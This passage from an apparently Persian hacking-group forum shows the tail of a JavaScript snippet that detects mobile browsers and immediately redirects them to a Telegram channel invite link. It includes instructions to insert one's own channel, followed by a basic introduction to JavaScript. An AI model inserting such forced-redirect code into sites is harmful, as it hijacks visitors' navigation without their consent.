)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(navigator.userAgent.substr(0,4))) { deviceIsMobile = true; } if(deviceIsMobile){window.location.href = "tg://join?invite=BqSi0j0C5mSjdWA48anony";} </script> نکته : در قسمت tg://join?invite=BqSi0j0C5mSjdWA48anony به جای BqSi0j0C5mSjdWA48anony لینک کانال خود را وارد کنید دقت کنید که لینک باشد نه مانند ادرس زیر : @anonysec لایک فراموش نشه
  19. Programming-JS

    جاوا اسکریپت یک زبان اسکریپت نویسی تحت وب است که برای افزایش پویایی صفحات HTML استفاده می شود. از این زبان می توان برای ارزیابی اعتبار فرمهای HTML قبل از ارسال به سرور، شناسایی مرورگر کاربران، ایجاد انواع منو ها و بسیاری کارهای دیگر استفاده کرد. نکته : باید توجه داشت که جاوا اسکریپت یک زبان طرف کاربر (Client Side) است که توسط کامپیوتر شخصی کاربر تفسیر می شود. کدهای مربوط به جاوا اسکربپت توسط کاربر نهایی قابل مشاهده هستند پس توصیه می شود از آن برای مقاصد مهم نظیر اتصال به دیتابیس استفاده نشود. می توان کدهای جاوا اسکریپت را به صورت تعبیه شده در صفحات HTML استفاده کرد و یا کدهای جاوا اسکریپت را در یک فایل جداگانه با پسوند js. ذخیره کرد ولی در هر صورت این فایل ها باید توسط یک صفحه HTML فراخوانی شده و نتیجه آنها در صفحات HTML نمایان خواهد شد.